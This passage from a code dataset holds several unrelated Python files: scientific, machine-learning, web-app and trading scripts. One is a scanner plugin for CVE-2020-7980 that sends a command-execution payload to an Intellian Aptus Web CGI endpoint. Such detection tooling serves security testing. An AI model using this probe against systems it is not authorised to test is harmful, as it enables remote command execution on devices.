refh=self.apexRefHeight_km)\n else:\n print(\"N/A; self.coordSys is {:s}\".format(self.coordSys))\n\n def __getSingleCoordTuple(self):\n\n if self.coordSys.upper() == 'AACGM_V2':\n\n mlatCGM, mlonCGM, mltCGM = aacgmv2.get_aacgm_coord(self.gdlat,\n self.gdlon,\n self.gdalt,\n self.dtime)\n\n return mlatCGM, mlonCGM, mltCGM\n\n elif self.coordSys.upper() == 'APEX':\n\n if not hasattr(self, 'apex'):\n\n self.apexRefTime = self.dtime\n\n if not hasattr(self, 'apexRefHeight_km'):\n self.apexRefHeight_km = 130\n\n print(\"Apex ref height, time initialized to {:5d}, {:s}\".format(\n self.apexRefHeight_km, self.apexRefTime.strftime(\"%Y-%m-%d\")))\n\n self.apex = apexpy.Apex(self.dtime, refh=self.apexRefHeight_km)\n\n mlatApex, mlonApex = self.apex.geo2apex(\n self.gdlat, self.gdlon, self.gdalt)\n\n mltApex = self.apex.mlon2mlt(mlonApex, self.dtime)\n\n return mlatApex, mlonApex, mltApex\n\n def __getSingleCoordMultiTimeTuple(self):\n\n if self.coordSys.upper() == 'AACGM_V2':\n\n mlatCGMs = []\n mlonCGMs = []\n mltCGMs = []\n\n # for i,dter in 
\n # for i,dter in enumerate(self.dtime):\n for dter in self.dtime:\n mlatCGM, mlonCGM, mltCGM = aacgmv2.get_aacgm_coord(self.gdlat,\n self.gdlon,\n self.gdalt,\n dter)\n\n mlatCGMs.append(mlatCGM)\n mlonCGMs.append(mlonCGM)\n mltCGMs.append(mltCGM)\n\n return mlatCGMs, mlonCGMs, mltCGMs\n\n elif self.coordSys.upper() == 'APEX':\n\n if not hasattr(self, 'apex'):\n\n self.apexRefTime = min(self.dtime)\n\n if not hasattr(self, 'apexRefHeight_km'):\n self.apexRefHeight_km = 130\n\n print(\"Apex ref height, time initialized to {:5d}, {:s}\".format(\n self.apexRefHeight_km, self.apexRefTime.strftime(\"%Y-%m-%d\")))\n\n self.apex = apexpy.Apex(\n self.apexRefTime, refh=self.apexRefHeight_km)\n\n # First get these\n mlatApex, mlonApex = self.apex.geo2apex(\n self.gdlat, self.gdlon, self.gdalt)\n\n # Need the number of months spanned\n relDel = relativedelta(max(self.dtime), min(self.dtime))\n add1 = int((relDel.days > 0) or (relDel.weeks > 0))\n nMaaneder = relDel.years*12 + relDel.months + add1\n\n mltsApex = []\n if nMaaneder == 0:\n\n for dter in self.dtime:\n mltApex = self.apex.mlon2mlt(mlonApex, dter)\n mltsApex.append(mltApex)\n\n else:\n\n t1 = min(self.dtime)\n for i in range(nMaaneder):\n startMaaned = t1 + relativedelta(months=i)\n stopMaaned = t1 + relativedelta(months=i+1)\n filt = [((tid >= startMaaned) and (tid <= stopMaaned))\n for tid in self.dtime]\n if np.where(np.array(filt))[0].size == 0:\n continue\n\n self.apex.set_epoch(startMaaned)\n\n tmpTimes = list(compress(self.dtime, filt))\n\n for dter in tmpTimes:\n mltApex = self.apex.mlon2mlt(mlonApex, dter)\n mltsApex.append(mltApex)\n\n mltsApex = np.array(mltsApex)\n mlatsApex = np.repeat(mlatApex, mltsApex.size)\n mlonsApex = np.repeat(mlonApex, mltsApex.size)\n\n return mlatsApex, mlonsApex, mltsApex\n","sub_path":"journals/CEDAR_Madrigal/RadarMLTConv.py","file_name":"RadarMLTConv.py","file_ext":"py","file_size_in_byte":9802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"331220192","text":"import os\nimport csv\n\n\nclass CloUpdateHandler:\n \"\"\"\n Class for handling newly received CLOs and updating or recreating the CSV\n file containing CLO data.\n \"\"\"\n @staticmethod\n def extract_received_and_stored_dict(clos, csv_file_path):\n \"\"\"\n Extract two dictionaries (received and stored post offices)\n \"\"\"\n stored_clos_uuid_map = {}\n\n # Create map of received CLO UUIDs with content (latitude, longitude, address)\n received_clos_uuid_map = {}\n for json_obj in clos:\n uuid = json_obj[\"uuid\"]\n received_clos_uuid_map[uuid] = json_obj\n\n if not os.path.isfile(csv_file_path):\n print(\"Postal offices csv file does not exist yet.\")\n else:\n # Open file and read line by line\n stored_clos_uuid_map = {}\n with open(csv_file_path, encoding=\"utf8\") as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n\n for row in csv_reader:\n # Get all important values - UUID, address, latitude and longitude\n address = row[0]\n uuid = row[1]\n lat = row[2]\n lon = row[3]\n\n # Map of stored CLOs\n stored_clos_uuid_map[uuid] = {\n \"uuid\": uuid,\n \"lat\": lat,\n \"lon\": lon,\n \"address\": address\n }\n csv_file.close()\n\n return received_clos_uuid_map, stored_clos_uuid_map\n
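\n # Illustrative call (values made up):\n # received, stored = CloUpdateHandler.extract_received_and_stored_dict(\n # [{\"uuid\": \"1212\", \"lat\": \"14.1\", \"lon\": \"47.4\", \"address\": \"Test road\"}],\n # \"clos.csv\")\n # # 'stored' stays empty while the csv file does not exist yet.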
\n @staticmethod\n def handle_new_clo_request(clos, csv_file_path):\n\n \"\"\"\n Handle a request for new CLOs. If any of the received post offices is not\n stored in the file from which the graph is built, we rewrite the file and\n rebuild the graph.\n :param clos:\n :param csv_file_path:\n :return:\n\n Example request (field clos):\n {\n \"CLOS\": [\n {\n \"uuid\": \"1212\",\n \"lat\": \"14.12222\",\n \"lon\": \"47.41243124\",\n \"address\": \"Test road\"\n },\n {\n \"uuid\": \"1214\",\n \"lat\": \"14.5235235\",\n \"lon\": \"46.521424\",\n \"address\": \"Hoolywood road\"\n }\n ]\n }\n \"\"\"\n received_clos_uuid_map, stored_clos_uuid_map = CloUpdateHandler.extract_received_and_stored_dict(clos,\n csv_file_path)\n build_new_graph = False\n\n if len(received_clos_uuid_map) != len(stored_clos_uuid_map):\n build_new_graph = True\n\n else:\n # Go through received CLOs and check if we do not have all of them stored\n for received_key in received_clos_uuid_map.keys():\n received_object = received_clos_uuid_map[received_key]\n\n # Check if there is a difference in uuids\n if received_key not in stored_clos_uuid_map.keys():\n #stored_clos_uuid_map.append()\n build_new_graph = True\n break\n # check if there is a difference in the other values\n else:\n stored_object = stored_clos_uuid_map[received_key]\n # Something is different, update this entry\n if stored_object[\"lat\"] != received_object[\"lat\"] or stored_object[\"lon\"] != \\\n received_object[\"lon\"] or stored_object[\"address\"] != received_object[\"address\"]:\n build_new_graph = True\n break\n\n if build_new_graph:\n with open(csv_file_path, 'w', newline='') as csv_file:\n csv_writer = csv.writer(csv_file)\n\n for json_obj in clos:\n csv_writer.writerow([json_obj[\"address\"], json_obj[\"uuid\"], json_obj[\"lat\"], json_obj[\"lon\"]])\n csv_file.close()\n\n return build_new_graph\n\n @staticmethod\n def handle_update_clo_request(clos, csv_file_path):\n \"\"\"\n Method used for detecting which CLOs changed and how.\n :param clos:\n :param csv_file_path:\n :return:\n\n Example request (field clos):\n {\n \"CLOS\": [\n {\n \"uuid\": \"1212\",\n \"lat\": \"14.12224442\",\n \"lon\": \"47.41243121445\",\n \"address\": \"Miami, Florida\",\n \"action\": \"update\"\n },\n {\n \"uuid\": \"1214\",\n \"lat\": \"14.5235235\",\n \"lon\": \"46.521424\",\n \"address\": \"Hoolywood road\",\n \"action\": \"remove\"\n }\n ]\n }\n \"\"\"\n received_clos_uuid_map, stored_clos_uuid_map = CloUpdateHandler.extract_received_and_stored_dict(clos, csv_file_path)\n build_new_graph = False\n clos_to_add_dict = {}\n\n # Go through received CLOs and check if we do not have all of them stored\n for received_key in received_clos_uuid_map.keys():\n received_object = received_clos_uuid_map[received_key]\n if \"action\" not in received_object:\n received_object[\"action\"] = None\n action = received_object[\"action\"]\n received_object.pop(\"action\", None)\n\n if received_key not in stored_clos_uuid_map.keys():\n if action is None or action == \"add\" or action == \"update\":\n print(\"received object\", received_object)\n\n clos_to_add_dict[received_key] = received_object\n build_new_graph = True # At least one CLO needs to be added or updated\n else:\n # We have a stored entry for this key\n stored_object = stored_clos_uuid_map[received_key]\n\n # If \"remove\", just continue with the for loop\n if action == \"remove\":\n build_new_graph = True\n continue\n elif stored_object[\"lat\"] != received_object[\"lat\"] or stored_object[\"lon\"] != \\\n received_object[\"lon\"] or stored_object[\"address\"] != received_object[\"address\"]:\n build_new_graph = True\n\n # Just add the already stored object;
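 the stored values, not the\n # received ones, get written back - the received values only decide\n # whether a rebuild is needed\n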
 clos_to_add_dict[received_key] = stored_object\n\n if build_new_graph:\n with open(csv_file_path, 'w', newline='') as csv_file:\n csv_writer = csv.writer(csv_file)\n\n for key in clos_to_add_dict.keys():\n obj = clos_to_add_dict[key]\n csv_writer.writerow([obj[\"address\"], obj[\"uuid\"], obj[\"lat\"], obj[\"lon\"]])\n csv_file.close()\n\n return build_new_graph\n","sub_path":"src/modules/utils/clo_update_handler.py","file_name":"clo_update_handler.py","file_ext":"py","file_size_in_byte":7147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"61341717","text":"import numpy as np\nfrom GaitAnaylsisToolkit.LearningTools.Trainer import GMMTrainer\nfrom GaitAnaylsisToolkit.Session import ViconGaitingTrial\nfrom GaitAnaylsisToolkit.LearningTools.Runner import GMMRunner\nfrom GaitCore.Core import Point\nimport matplotlib.pyplot as plt\nfrom dtw import dtw\nimport numpy.polynomial.polynomial as poly\n\n\ndef make_toe(files, hills, sides):\n\n pathsZ = []\n pathsY = []\n pathsX = []\n\n for hill, file, side in zip(hills, files, sides):\n\n trial = ViconGaitingTrial.ViconGaitingTrial(vicon_file=file)\n marker = trial.vicon.get_markers()\n if side == \"L\":\n toe = marker.get_marker(\"LTOE\")\n else:\n toe = marker.get_marker(\"RTOE\")\n\n jointZ = []\n jointY = []\n jointX = []\n\n for t in toe:\n jointZ.append(t.z)\n jointY.append(t.y)\n jointX.append(t.x)\n\n pathsZ.append(np.array([jointZ[h[0]] for h in hill]))\n pathsY.append(np.array([jointY[h[0]] for h in hill]))\n pathsX.append(np.array([jointX[h[0]] for h in hill]))\n\n return pathsZ, pathsY, pathsX\n\n\ndef get_index(frames, files, side):\n\n paths = []\n for file in files:\n trial = ViconGaitingTrial.ViconGaitingTrial(vicon_file=file)\n markers = trial.vicon.get_markers()\n markers.smart_sort()\n markers.auto_make_transform(frames)\n if side == \"L\":\n hills = trial.get_stairs(\"LTOE\", \"stairA\")\n else:\n hills = trial.get_stairs(\"RTOE\", \"stairA\")\n\n paths.append(hills[0])\n\n return paths","sub_path":"utilities/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"598415431","text":"'''\n@Author: hua\n@Date: 2019-06-17 14:14:28\n@description: \n@LastEditors: hua\n@LastEditTime: 2019-08-28 14:06:13\n'''\nfrom gevent import monkey\nmonkey.patch_all(select=True, socket=True)\nfrom app import app, socketio\n# https://www.cnblogs.com/franknihao/p/7202253.html uwsgi configuration\napp = app\nif __name__ == '__main__':\n app.debug = False\n socketio.run(app, host='0.0.0.0', port=501)\n ","sub_path":"chatApi/socketRun.py","file_name":"socketRun.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"498419287","text":"import shutil\nimport os\nimport matplotlib.pyplot as plt\n\ntrain_set_base_dir = 'I:\\Projects\\TensorFlow\\GTSRB_img_Crop\\Final_Training\\Images'\nvalidation_set_base_dir = 'I:\\Projects\\TensorFlow\\GTSRB_img_Crop\\Final_Validation\\Images'\n\n# start image preprocess\nfrom keras.preprocessing.image import ImageDataGenerator\n\ntrain_datagen = ImageDataGenerator(\n rescale=1. / 255\n)\ntrain_data_generator = train_datagen.flow_from_directory(\n directory=train_set_base_dir,\n target_size=(48, 48),\n batch_size=32,\n class_mode='categorical')\n\n
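# The validation generator below mirrors the training one: just the 1/255\n# rescale (no augmentation), yielding batches of 48x48 crops.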
\nvalidation_datagen = ImageDataGenerator(\n rescale=1. / 255\n)\n\nvalidation_data_generator = validation_datagen.flow_from_directory(\n directory=validation_set_base_dir,\n target_size=(48, 48),\n batch_size=32,\n class_mode='categorical'\n)\n\n# define a simple CNN network\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPool2D, Flatten, Dense, Dropout\n\nmodel = Sequential()\n\n# add Conv2D layers\nmodel.add(Conv2D(filters=32, kernel_size=(3, 3), activation='relu', input_shape=(48, 48, 3)))\nmodel.add(MaxPool2D(pool_size=(2, 2), padding='valid'))\n\nmodel.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu'))\nmodel.add(MaxPool2D(pool_size=(2, 2), padding='valid'))\n\nmodel.add(Conv2D(filters=128, kernel_size=(3, 3), activation='relu'))\nmodel.add(MaxPool2D(pool_size=(2, 2), padding='valid'))\n\nmodel.add(Conv2D(filters=128, kernel_size=(3, 3), activation='relu'))\nmodel.add(MaxPool2D(pool_size=(2, 2), padding='valid'))\n\n# flatten\nmodel.add(Flatten())\n\n# dropOut layer\nmodel.add(Dropout(0.2))\n\n# add one simple layer for classification\nmodel.add(Dense(units=512, activation='relu'))\n\n# add output layer\nmodel.add(Dense(units=43, activation='softmax'))\n\n# compile model\nmodel.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])\n\n# print model info\nmodel.summary()\njson_str = model.to_json()\nprint(json_str)\n# fit the model using the data generators\nhistory = model.fit_generator(\n generator=train_data_generator,\n steps_per_epoch=100,\n epochs=30,\n validation_data=validation_data_generator,\n validation_steps=50)\n\n# train done, save the model\nmodel.save('I:\\Projects\\TensorFlow/traffic_signs.h5')\n\n# plot the accuracy and loss curves\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs = range(1, len(acc) + 1)\nplt.plot(epochs, acc, 'bo', label='Training acc')\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\nplt.title('Training and validation accuracy')\nplt.legend()\n\nplt.figure()\n\nplt.plot(epochs, loss, 'bo', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.legend()\n\nplt.show()\n","sub_path":"dateset_process/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"493287209","text":"from urllib.request import urlretrieve\nimport os\nfrom gzip import GzipFile\nfrom time import time\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_auc_score\nfrom joblib import Memory\nfrom pygbm import GradientBoostingMachine\n# from lightgbm import LGBMClassifier\n# for now as pygbm does not have classifier loss yet:\nfrom lightgbm import LGBMRegressor\nimport numba\n\n\nHERE = os.path.dirname(__file__)\nURL = (\"https://archive.ics.uci.edu/ml/machine-learning-databases/00280/\"\n \"HIGGS.csv.gz\")\nm = Memory(location='/tmp', mmap_mode='r')\nn_leaf_nodes = 31\nn_trees = 10\nsubsample = None\nlr = 1.\nmax_bins = 255\n\n\n@m.cache\ndef load_data():\n filename = os.path.join(HERE, URL.rsplit('/', 1)[-1])\n if not os.path.exists(filename):\n print(f\"Downloading {URL} to {filename} (2.6 GB)...\")\n urlretrieve(URL, filename)\n print(\"done.\")\n\n print(f\"Parsing {filename}...\")\n tic = time()\n with GzipFile(filename) as f:\n df = pd.read_csv(f, header=None, dtype=np.float32)\n toc = time()\n
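 # The HIGGS csv ships without a header row; column 0 is the class label\n # and the remaining columns are the features.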
 print(f\"Loaded {df.values.nbytes / 1e9:0.3f} GB in {toc - tic:0.3f}s\")\n return df\n\n\ndf = load_data()\ntarget = df.values[:, 0]\ndata = np.ascontiguousarray(df.values[:, 1:])\ndata_train, data_test, target_train, target_test = train_test_split(\n data, target, test_size=50000, random_state=0)\n\nif subsample is not None:\n data_train, target_train = data_train[:subsample], target_train[:subsample]\n\nn_samples, n_features = data_train.shape\nprint(f\"Training set with {n_samples} records and {n_features} features.\")\n\nprint(\"Fitting a LightGBM model...\")\ntic = time()\nlightgbm_model = LGBMRegressor(n_estimators=n_trees, num_leaves=n_leaf_nodes,\n learning_rate=lr, verbose=10)\nlightgbm_model.fit(data_train, target_train)\ntoc = time()\npredicted_test = lightgbm_model.predict(data_test)\nroc_auc = roc_auc_score(target_test, predicted_test)\nprint(f\"done in {toc - tic:.3f}s, ROC AUC: {roc_auc:.4f}\")\n\n# model_string = lightgbm_model._Booster._save_model_to_string()\n# in_tree = False\n# for line in model_string.split('\\n'):\n# if line.startswith('Tree'):\n# in_tree = True\n# if in_tree and line == '':\n# in_tree = False\n# print()\n# if in_tree:\n# print(line)\n\nprint(\"JIT compiling code for the pygbm model...\")\ntic = time()\npygbm_model = GradientBoostingMachine(learning_rate=lr, max_iter=1,\n max_bins=max_bins,\n max_leaf_nodes=n_leaf_nodes,\n random_state=0, scoring=None,\n verbose=0, validation_split=None)\npygbm_model.fit(data_train[:100], target_train[:100])\ntoc = time()\nprint(f\"done in {toc - tic:.3f}s\")\n\n\nprint(\"Fitting a pygbm model...\")\ntic = time()\npygbm_model = GradientBoostingMachine(learning_rate=lr, max_iter=n_trees,\n max_bins=max_bins,\n max_leaf_nodes=n_leaf_nodes,\n random_state=0, scoring=None,\n verbose=1, validation_split=None)\npygbm_model.fit(data_train, target_train)\ntoc = time()\npredicted_test = pygbm_model.predict(data_test)\nroc_auc = roc_auc_score(target_test, predicted_test)\nprint(f\"done in {toc - tic:.3f}s, ROC AUC: {roc_auc:.4f}\")\n\n# for predictor in pygbm_model.predictors_:\n# print(predictor.nodes)\n\n\nif hasattr(numba, 'threading_layer'):\n print(\"Threading layer chosen: %s\" % numba.threading_layer())\n","sub_path":"benchmarks/bench_higgs_boson.py","file_name":"bench_higgs_boson.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"238376223","text":"from django.db import models\n\n# Create your models here.\n\nclass Settings(models.Model):\n class Meta:\n app_label = 'core'\n verbose_name = \"Service settings\"\n verbose_name_plural = verbose_name\n\n def __str__(self):\n return self.title\n\n settings_id = models.SlugField(max_length=50, default='unknown', unique=True)\n settings_id.verbose_name = \"Unique configuration ID\"\n settings_id.help_text = \"Used to customize individual services\"\n\n title = models.CharField(default='Print service', max_length=255)\n title.verbose_name = \"Project title\"\n title.help_text = \"\"\n\n title_navbar = models.CharField(default='Print service', max_length=255)\n title_navbar.verbose_name = \"Project title for the navigation bar\"\n title_navbar.help_text = \"\"\n\n company_name = models.CharField(default='2016 ФОПФ МФТИ', max_length=255)\n company_name.verbose_name = \"Credits\"\n company_name.help_text = \"Credits shown on every page of the
проекта\"\n\n","sub_path":"src/core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"89078385","text":"#!/usr/bin/env python3\n\n'''\nname: CVE-2020-7980漏洞\ndescription: CVE-2020-7980漏洞可执行任意命令\n'''\n\nimport time\nimport calendar\nfrom app.lib.utils.common import get_capta\nfrom app.lib.utils.request import request\n\nclass CVE_2020_7980_BaseVerify:\n def __init__(self, url):\n self.url = url\n self.capta = get_capta()\n self.data = {\n \"O_\":\"A\",\n \"V_\":1,\n \"S_\":123456789,\n \"F_\":\"EXEC_CMD\",\n \"P1_\":{\n \"F\":\"EXEC_CMD\",\n \"Q\":'echo %s' % (self.capta)\n }\n }\n\n def run(self):\n try:\n if not self.url.startswith(\"http\") and not self.url.startswith(\"https\"):\n self.url = \"http://\" + self.url\n cmd_request = request.post(self.url + '/cgi-bin/libagent.cgi?type=J&' + str(calendar.timegm(time.gmtime())) + '000', json = self.data, cookies = {'ctr_t': '0', 'sid': '123456789'})\n if cmd_request.status_code == 200 and self.capta in cmd_request.text:\n result = cmd_request.text.split()[-2].replace('},', '')\n print(\"存在CVE-2020-7980漏洞,执行结果为:\", result)\n return True\n else:\n print(\"不存在CVE-2020-7980漏洞\")\n return False\n except Exception as e:\n print(e)\n return False\n finally:\n pass\n\nif __name__ == '__main__':\n CVE_2020_7980 = CVE_2020_7980_BaseVerify('http://127.0.0.1')\n CVE_2020_7980.run()","sub_path":"python/app/plugins/http/Intellian Aptus Web/CVE_2020_7980.py","file_name":"CVE_2020_7980.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"122095257","text":"import os\nfrom functools import wraps\n\nfrom flask import (Flask, redirect, request, render_template, url_for, session)\nfrom flask_pymongo import PyMongo\n\n\napp = Flask(__name__)\napp.secret_key = os.environ.get(\"SECRET_KEY\")\n# connect app as mongodb client\napp.config[\"MONGO_DBNAME\"] = os.environ.get(\"MONGO_DBNAME\")\napp.config[\"MONGO_URI\"] = os.environ.get(\"MONGO_URI\")\n# 'main' database is exposed as mongo.db\nmongo = PyMongo(app)\n\ndebugging = \"DEBUG\" in os.environ\n\n\ndef requires_user(func):\n \"\"\"\n Redirects wrapped route to user definition if no user in session.\n \"\"\"\n @wraps(func)\n def route(*args, **kwargs):\n if session.get(\"user\") is None:\n # Display flash message?\n return redirect(url_for(\"user\"))\n else:\n return func(*args, **kwargs)\n\n return route\n\n\n@app.route(\"/\")\n@requires_user\ndef home():\n \"\"\"\n Shows the home page/default route and main app page\n Loads all provisions from mongodb collection\n \"\"\"\n\n # Performs an join like query to get all values of ws_considerations with\n # Corrosponding provisions attached\n considerations = list(mongo.db.ws_considerations.aggregate([\n {\n \"$lookup\" : {\n \"from\" : \"provisions\",\n \"localField\" : \"_id\",\n \"foreignField\" : \"ws_consideration\",\n \"as\" : \"provisions\"\n }\n }\n ]))\n\n return render_template(\n \"index.html\",\n page_title=\"Home\",\n considerations=considerations\n )\n\n\n@app.route('/about')\ndef about():\n \"\"\"\n About Page\n \"\"\"\n return render_template(\"about.html\", page_title=\"About\")\n\n\n@app.route('/faq')\ndef faq():\n \"\"\"\n FAQ Page\n \"\"\"\n return render_template(\"faq.html\", page_title=\"FAQ\")\n\n\n@app.route(\"/user\", methods=[\"GET\", \"POST\"])\ndef user():\n \"\"\"\n User log in page\n Landing page for users not in 
session\n \"\"\"\n if request.method == 'POST':\n # Ensure firstname provided, but allow lastname to be blank.\n # We don't want to discriminate against Madonna\n if \"firstname\" in request.form and request.form[\"firstname\"]:\n session[\"user\"] = {\n \"firstname\": request.form[\"firstname\"],\n \"lastname\": None\n }\n if \"lastname\" in request.form:\n session[\"user\"][\"lastname\"] = request.form[\"lastname\"]\n\n return redirect(url_for(\"home\"))\n\n return render_template(\"user.html\", page_title=\"Welcome\")\n\n\n@app.route(\"/submit\", methods=[\"GET\", \"POST\"])\n@requires_user\ndef submit():\n \"\"\"\n Submits the user's selections\n \"\"\"\n return \"

Submit success goes here

\"\n\n\nif __name__ == \"__main__\":\n app.run(debug=debugging)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"128004055","text":"from scripts.波动率计算 import *\n\ndf1 = pd.read_excel(\"C:\\\\Users\\\\Lenovo\\\\Desktop\\\\转债分钟行情数据.xlsx\", sheet_name=\"113009广汽转债\").fillna(method='ffill')\ndf2 = pd.read_excel(\"C:\\\\Users\\\\Lenovo\\\\Desktop\\\\转债分钟行情数据.xlsx\", sheet_name=\"113021中信转债\").fillna(method='ffill')\ndf = pd.read_excel(\"C:\\\\Users\\\\Lenovo\\\\Desktop\\\\转债分钟行情数据.xlsx\", sheet_name=\"110053苏银转债\").fillna(method='ffill')\n\ndf3 = pd.read_excel(\"C:\\\\Users\\\\Lenovo\\\\Desktop\\\\转债分钟行情数据.xlsx\", sheet_name=\"127012招路转债\").fillna(method='ffill')\ndf4 = pd.read_excel(\"C:\\\\Users\\\\Lenovo\\\\Desktop\\\\转债分钟行情数据.xlsx\", sheet_name=\"113011光大转债\").fillna(method='ffill')\ndf5 = pd.read_excel(\"C:\\\\Users\\\\Lenovo\\\\Desktop\\\\转债分钟行情数据.xlsx\", sheet_name=\"113013国君转债\").fillna(method='ffill')\ndf6 = pd.read_excel(\"C:\\\\Users\\\\Lenovo\\\\Desktop\\\\转债分钟行情数据.xlsx\", sheet_name=\"110046圆通转债\").fillna(method='ffill')\ndf7 = pd.read_excel(\"C:\\\\Users\\\\Lenovo\\\\Desktop\\\\转债分钟行情数据.xlsx\", sheet_name=\"110051中天转债\").fillna(method='ffill')\n\n\n# df1,df2,df4,df5\n#\n# df['Mean'] = SMA(df.close.values, 30)\n# df['Std'] = STD(df.close.values, 30)\n# a = 60\n# df['Mean'] = SMA(df.close.values, a)\n# df['Std'] = STD(df.close.values, 20, a)\n# df['KAMA'] = talib.KAMA(df.close, 30)\n# df1['KAMA'] = talib.KAMA(df1.close, 20)\n# df2 = df2.fillna(method='ffill')\n# df1['KAMA'] = talib.KAMA(df1.close, 20)\n# df2['KAMA'] = talib.KAMA(df2.close, 20)\n# df3['KAMA'] = talib.KAMA(df3.close, 20)\n# df4['KAMA'] = talib.KAMA(df4.close, 20)\n# df5['KAMA'] = talib.KAMA(df5.close, 20)\n# df6['KAMA'] = talib.KAMA(df6.close, 20)\n# df7['KAMA'] = talib.KAMA(df7.close, 20)\n#\ndef profitsCal(df,start,end,positionList,upper=0.02,lower=0.01, adds = 0.1, cutoff = 0.1):\n buypriceList = []\n yieldList = []\n for i in np.arange(1,df.shape[0]):\n if len(buypriceList) > 0 and (df.high[i] >= buypriceList[0] + 0.02 or df.high[i-1] >= buypriceList[0] + 0.02):\n yieldList.append(0.015)\n buypriceList.pop(0)\n # if len(buypriceList) > 0 and df.high[i] == buypriceList[0] + 0.03:\n # yieldList.append(0.015)\n # buypriceList.pop(0)\n # if len(buypriceList) > 0 and df.high[i] == buypriceList[0] + 0.02:\n # yieldList.append(-0.005)\n # buypriceList.pop(0)\n if len(buypriceList) > 0 and df.low[i] <= df.high[i] - 0.02:\n yieldList.append(max(df.high[i]-buypriceList[0]-0.02,df.high[i-1]-buypriceList[0]-0.02))\n buypriceList.pop(0)\n\n if df.high[i] >= df.KAMA[i]-0.02 and df.close[i-1] < df.KAMA[i-1]: # 前一分钟的收盘价在均值一下,这一分钟的最高价在均值以上\n if buypriceList.__len__() == 0:\n buypriceList.append(df.KAMA[i]-0.015)\n return yieldList\n\ndef Cal(df,start,end,positionList,upper=0.02,lower=0.01, adds = 0.1, cutoff = 0.1):\n yieldList = []\n for i in np.arange(100, df.shape[0]):\n if df.close[i-1] < df.KAMA[i-1]:\n if df.high[i] >= df.KAMA[i] + 0.01: # 前一分钟的收盘价在均值一下,这一分钟的最高价在均值以上\n yieldList.append(0.01)\n if df.high[i] > df.KAMA[i] - 0.02 and df.high[i] < df.KAMA[i] + 0.01:\n yieldList.append(-0.01)\n return yieldList\n#\n#\n# yieldList = profitsCal(df2,100,4000,[])\n# print(len(yieldList))\n# print(sum(yieldList))\n#\n# yieldList = profitsCal(df1,100,4000,[])\n# print(len(yieldList))\n# print(sum(yieldList))\n#\n# yieldList = profitsCal(df,100,4000,[])\n# print(len(yieldList))\n# 
print(sum(yieldList))\n#\n# yieldList = profitsCal(df3,100,4000,[])\n# print(len(yieldList))\n# print(sum(yieldList))\n#\n# yieldList = profitsCal(df4,100,4000,[])\n# print(len(yieldList))\n# print(sum(yieldList))\n#\n# yieldList = profitsCal(df5,100,4000,[])\n# print(len(yieldList))\n# print(sum(yieldList))\n#\n# yieldList = profitsCal(df6,100,4000,[])\n# print(len(yieldList))\n# print(sum(yieldList))\n#\n# yieldList = profitsCal(df7,100,4000,[])\n# print(len(yieldList))\n# print(sum(yieldList))\n\n\n##################2019年5月27日16:58:51\ndef func1(df):\n df['KAMA'] = talib.KAMA(df.close, 20)\n temp = (df.low - df.KAMA.shift(1)).dropna().values\n notes = []\n su = []\n for item in temp:\n if item < 0:\n su.append(item)\n else:\n if su.__len__() > 0:\n notes.append(min(su))\n su = []\n plt.hist(notes, 100)\n plt.show()\n print(\"30:%f\" % np.quantile(notes, 0.3))\n print(\"70:%f\" % np.quantile(notes, 0.7))\n return notes\n\n\ndef test(df, start, end):\n df['upper'], df['middle'], df['lower'] = talib.BBANDS(df.close, matype=talib.MA_Type.T3)\n df['CCI'] = talib.CCI(df.high, df.low, df.close, timeperiod=24)\n df['macd'], macdsignal, macdhist = talib.MACD(df.close)\n df['HT_DCPERIOD'] = talib.HT_DCPERIOD(df.close)\n # (df.high > df.lower) & ((df.low < df.lower).shift(1))\n # df.CCI > 200 # False\n # (df.CCI >= -200) & (df.CCI < 0) # False\n df['buy_point'] = (df.high > df.lower) & (df.low < df.lower).shift(1) & (\n (df.CCI >= 0) & (df.CCI < 200) | (df.CCI < -200)) & (df.macd > -0.05) & (df['HT_DCPERIOD'] > 20)\n x_point = df[df['buy_point'] == True].index.values + 1\n y_point = df[df['buy_point'] == True].close\n plt.plot(df.close)\n plt.plot(x_point, y_point, 'o')\n plt.show()\n\n\ntest(df.iloc[500:3500, :].copy(), 500, 1500)\n\n\n####\ndef bolltest(df, start, end):\n upper, middle, lower = talib.BBANDS(df.close, matype=talib.MA_Type.T3)\n plt.plot(upper[start:end])\n plt.plot(middle[start:end])\n plt.plot(lower[start:end])\n plt.plot(df.close.iloc[start:end])\n idx = np.arange(df.shape[0])\n # temp = (df.close > lower)& (df.close < lower).shift(1)\n # temp = temp.shift(1)\n # temp[:start] = False\n # temp[end:] = False\n # plt.plot(idx[temp], df.close[temp],'yo')\n plt.legend(['upper', 'middle', 'lower', 'close'])\n plt.title(\"bolling\")\n plt.show()\n\n\noutput = bolltest(df, 500, 1500)\n\n\ndef ATRtest(df, start, end):\n outATR = talib.ATR(df.high, df.low, 